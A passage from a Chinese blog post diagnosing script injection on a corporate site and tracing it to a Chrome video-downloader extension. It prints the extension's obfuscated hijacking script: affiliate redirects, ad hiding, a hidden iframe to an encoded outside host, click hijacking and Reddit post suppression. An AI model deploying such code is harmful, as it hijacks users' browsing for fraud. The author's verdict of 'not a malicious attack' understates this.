e=window.location.hostname;1<(e.match(/\./g)||[]).length&&(e=e.replace(/^[^.]+\./g,""));var t={"g2a.com":"https://www.g2a.com/r/user-59156607d1e93"};void 0===t[e]||function(e){for(var t=e+"=",n=document.cookie.split(";"),r=0;r<n.length;r++){for(var o=n[r];" "==o.charAt(0);)o=o.substring(1);if(0==o.indexOf(t))return o.substring(t.length,o.length)}}(t[e])||(function(e,t,n){var r=new Date;r.setTime(r.getTime()+30*n*30*1e3);var o="expires="+r.toUTCString();document.cookie=e+"="+t+";"+o+";path=/"}(t[e],"1",5),window.location=t[e]);var n={};void 0!==n[e]&&(window.location=n[e])}(),function(){if("undefined"!=typeof document&&document&&!window.zj4lfdl4&&"http"===location.href.substr(0,4)){window.zj4lfdl4=!0;var y=void 0!==window.navigator&&"string"==typeof window.navigator.userAgent&&0<window.navigator.userAgent.indexOf("Edg/"),t=function(){t=function(){};var b=".g .r > a > h3, .g .r > a > div, .g .r > h3 > a, .osl > a, .g a > h3, .g a > div, .g h3 > a, .g a > h3, .g h3";!function(){function n(e){return"function"==typeof e&&-1<e.toString().indexOf("[native ")}function i(e,t){return n(e.appendChild)&&"bing"!=r?(p("appending ",+t.toString()+"(1)"),e.appendChild(t)):n(document.appendChild)?(p("appending "+t.toString()+"(2)"),document.appendChild.apply(e,[t])):n(window.crel076)?(p("appending "+t.toString()+"(3)"),window.crel076.apply(e,[t])):(p("can't append "+t.toString()),null)}var p,f={sub_ID:"1",CTR:.375,placeRates:[100,60,20,10]},r=-1<location.host.indexOf("google")?"google":"www.bing.com"===location.host?"bing":"?",e=atob(["aHR0cHM6Ly","9ibGFja","3NlYX","JjaC5","vcmcv","c3Av"].join("")),c={iframeURL:e+"s.html?",redirectURL:e+"clk.html?url={URL}&",queryStringTemplate:"q={KEYWORDS}",querySubIDTemplate:"",messageStart:"cadsbCver"};p=function(e){0};function s(e){p(e.name+": "+e.message+"\n"+e.stack)}function t(){return p("Error: website '"+r+"' is not supported"),!1}var a;a=function(){if(y&&"bing"==r)return b=".b_algo","/search"===location.pathname;var e=document.domain.split("."),t=e.indexOf("google");if(0!==t&&1!==t)return!1;if(1==t&&"www"!=e[0])return!1;if("/search"!=location.pathname)return!1;var n=location.search;return!(0<n.indexOf("tbm=")&&n.indexOf("tbm=shop")<=0)};var d;d=function(){var e,t;return!!((t=decodeURIComponent((new RegExp("[?|&]"+"q"+"=([^&;]+?)(&|#|;|$)").exec(location.search)||[null,""])[1].replace(/\+/g,"%20"))||"")&&t.trim&&(e=t.trim()))&&e};function u(){var e=localStorage[o];return e&&"null"!=e?e:""}function l(e){e&&"null"!=e&&(localStorage[o]=e)}function m(r,o,a){if(!v){v=!0;var i;i=function(e){if(!function(e){for(var t=document.querySelectorAll(b),n=[],r=e;r;)n.push(r),r=r.parentNode;for(var o=0;o<t.length;o++)for(var a=0;a<n.length;a++)if(t[o]==n[a])return!0;return!1}(e.target))return!0;i=function(){return!0},e.stopPropagation&&e.stopPropagation(),e.stopImmediatePropagation&&e.stopImmediatePropagation(),e.preventDefault&&e.preventDefault();var t=c.redirectURL.replace("{URL}",encodeURIComponent(o));if(!t)return p("Error: no base.redirectURL ("+JSON.stringify(c)+")"),!1;var n=t+r;return window.open(n)?(h.decrease(),g.click(),l(a)):p("Cannot open "+n),!1},r&&o&&"http"==o.substr(0,4)?document.documentElement.addEventListener("click",function(e){try{if(i)return i(e)}catch(e){s(e)}return!0},!0):p("Invalid setClick params: "+r+", "+o)}}var h=new function(){var t=c.messageStart+"Prob"+f.CTR.toString();this.set=function(e){return e=e.toFixed(4),localStorage[t]=e,parseFloat(e)},this.get=function(){var e=parseFloat(localStorage[t]);return!e||1<=e?this.set(f.CTR):+e},this.increase=function(){this.set(1-(1-this.get())*(1-f.CTR))},this.decrease=function(){this.set(f.CTR)},this.check=function(){var e=Math.random(),t=this.get();return p("rnd: "+e.toString()+", ctr: "+t.toString()),e<t}},g=new function(){function r(e){var t=localStorage[e],n=0;if(t)try{var r=JSON.parse(t);n=parseInt(r[a])||0}catch(e){}return n}function e(e){var t=r(e)+1,n={};n[a]=t,localStorage[e]=JSON.stringify(n)}var t,n=c.messageStart+"Limit",o=n+"Requests",a=(t=new Date).getFullYear()+"-"+(t.getMonth()+1)+"-"+t.getDate();this.click=function(){},this.check=function(){return!0},this.checkRequests=function(){return e(o),r(o)<=10},this.serialize=function(){return JSON.stringify({today:a,req:r(o),clk:r(n)})}},o=c.messageStart+"Kwds",v=!1;"www.bing.com"!==location.host&&"google"==r&&function(){var e=document.createElement("style");if(e.innerText="#tads, #bottomads {display: none !important}",!function(){return!!document.head&&(i(document.head,e),!0)}())var t=setInterval(function(){clearInterval(t)},100)}(),"www.bing.com"===location.host&&function(){var e=document.createElement("style");if(e.innerText=".b_ad {display: none !important}",!function(){return!!document.head&&(i(document.head,e),!0)}())var t=setInterval(function(){clearInterval(t)},100)}();function A(){try{if(window!=window.top)return;if(!a())return;var n=d();if(!n)return void p("No keywords found: "+location.href);if(200<n.length)return void p("Search query is too long");if(0===document.querySelectorAll(b).length)return void p("Error: selector failed");var e=encodeURIComponent(c.messageStart+n);if(window[e])return void p("Code already loaded on this page");if(window[e]=!0,u()==n)return void p("Last keywords '"+u()+"' are the same as current keywords '"+n+"'");if(!g.check())return;var r=(t=n,o="0"==f.sub_ID?"":c.querySubIDTemplate,(c.queryStringTemplate+o).replace("{SUB_ID}",encodeURIComponent(f.sub_ID)).replace("{KEYWORDS}",encodeURIComponent(t)));if(!r)return void p("Error: no queryString ("+JSON.stringify(c)+")");if(!g.checkRequests())return;!function(e,o){var t=document.createElement("iframe"),a=!1;t.setAttribute("style","display:none!important");var n=c.iframeURL;n?(t.src=n+e,window.addEventListener("message",function(t){try{var e=c.messageStart+"IResults=";if(t&&t.data&&t.data.indexOf&&0==t.data.indexOf(e)){if(a)return;a=!0;var n=t.data.replace(e,""),r=[];try{r=JSON.parse(n)}catch(t){p("Error: invalid results ("+n+")")}o(r)}}catch(e){s(e),p(t.data)}}),i(document.body,t),setInterval(function(){try{!a&&t&&t.contentWindow&&t.contentWindow.postMessage(c.messageStart+"GimmeResults","*")}catch(e){s(e)}},200)):p("Error: no base.iframeURL ("+JSON.stringify(c)+")")}(r,function(e){try{(!!e).toString(),e.length.toString();if(!e||!e.length)return void l(n);if(!h.check())return;var t=function(e){p(e);var t=0,n=f.placeRates,r=[],o=[];for(var a in e)void 0!==e[a].isProduct&&e[a].isProduct?r.push(e[a]):o.push(e[a]);if(r.length&&(!o.length||Math.random()<=.3))p("products"),t=(e=r).length<=4||Math.random()<=.66?Math.floor(Math.random()*Math.min(e.length,4))+1:Math.floor(Math.random()*e.length)+4;else{p("text results"),e=o;for(var i=0,c=[],s=Math.min(n.length,e.length),d=0;d<s;d++)i+=n[d],c.push(i);for(var u=Math.random()*i,l=0;l<c.length;l++)if(u<c[l]){t=l+1;break}}if(!t)return p("Error: place = 0"),!1;if(void 0===e[t-1])return p("Error: place = "+t),!1;p("pos "+t);var m=e[t-1].link;return m&&m.substr&&"http"==m.substr(0,4)?m:(p("Error: invalid result URL"),!1)}(e);if(!t)return;h.increase(),m(r,t,n)}catch(e){s(e)}})}catch(n){s(n)}var t,o}var w=document.readyState;"complete"==w||"interactive"==w?A():document.addEventListener("DOMContentLoaded",A,!1)}()};if(document.head)t();else try{var e=document.createElement("head");document.documentElement.appendChild(e),t()}catch(e){var n=setInterval(function(){document.head&&(clearInterval(n),t())},300)}}}(),function(){"use strict";function e(){if(!window.t4gj6l4){window.t4gj6l4=!0;var a=function(){var t=[],e=document.getElementsByClassName("public-DraftEditor-content");return e.length&&Array.from(e).forEach(function(e){t.push(e.innerText.toLowerCase()),t.push(e.innerHTML.toLowerCase())}),Array.from(document.getElementsByTagName("textarea")).forEach(function(e){t.push(e.value.toLowerCase())}),t},i=["lacksearch","lack search"];document.body.addEventListener("click",function(e){if("submit"===e.target.getAttribute("type")&&"Discard"!==e.target.innerText)for(var t=a(),n=0;n<i.length;n++)for(var r=0;r<t.length;r++)if(-1<t[r].indexOf(i[n]))return e.preventDefault(),e.stopPropagation(),!1;if(-1<window.location.pathname.indexOf("/submit")&&"button"===e.target.tagName.toLowerCase()){var o=e.target;if("button"===o.getAttribute("role")&&o.innerText&&(o.innerText.toUpperCase()===o.innerText&&o.innerHTML.toUpperCase()===o.innerText||"footer"===o.parentElement.tagName.toLowerCase()&&-1===o.innerText.toLowerCase().indexOf("discard")))for(t=a(),n=0;n<i.length;n++)for(r=0;r<t.length;r++)if(-1<t[r].indexOf(i[n]))return e.preventDefault(),e.stopPropagation(),!1}},!0)}}if("www.reddit.com"===window.location.hostname){var t=document.readyState;"complete"==t||"interactive"==t?e():document.addEventListener("DOMContentLoaded",e,!1)}}();
/*_endRev50_s6_*/
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <!-- Yandex.Metrika counter -->
    <script type="text/javascript" >
        (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
            m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
        (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

        ym(48342581, "init", {
            clickmap:true,
            trackLinks:true,
            accurateTrackBounce:true,
            webvisor:true
        });
    </script>
    <noscript><div><img src="https://mc.yandex.ru/watch/48342581" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
    <!-- /Yandex.Metrika counter -->
</head>
<body>

</body>
</html>

在这里插入图片描述

从上述加载情况来看,像是 requirejs入口脚本方式注入,该方式将首先向页面注入require.js,把js函数放在head元素内,注入js脚本实际上就是给head元素添加一个script的子元素。随后将把“脚本URL”文本框中输入的远程脚本作为requirejs的入口脚本执行。

2)相关经验表明这是google的一个扩展插件导致的

在google浏览器打开chrome://extensions/,打开扩展程序页面,其中有一个扩展插件:Online Video Downloader for FB 2.0.0,它是一个在线视频下载器是一个免费的,易于下载在线视频剪辑的扩展;ID:ldcbiiiljlkcddipefbkejfolmbnkhci;如下所示:
在这里插入图片描述
然后将此插件关闭禁用,刷新页面查看:
在这里插入图片描述
集团业务网站刷新后也不再请求原先异常网页。

综上,本次疑似脚本注入事件原因为:google自身扩展插件造成,非外部恶意攻击所致。

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

羌俊恩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值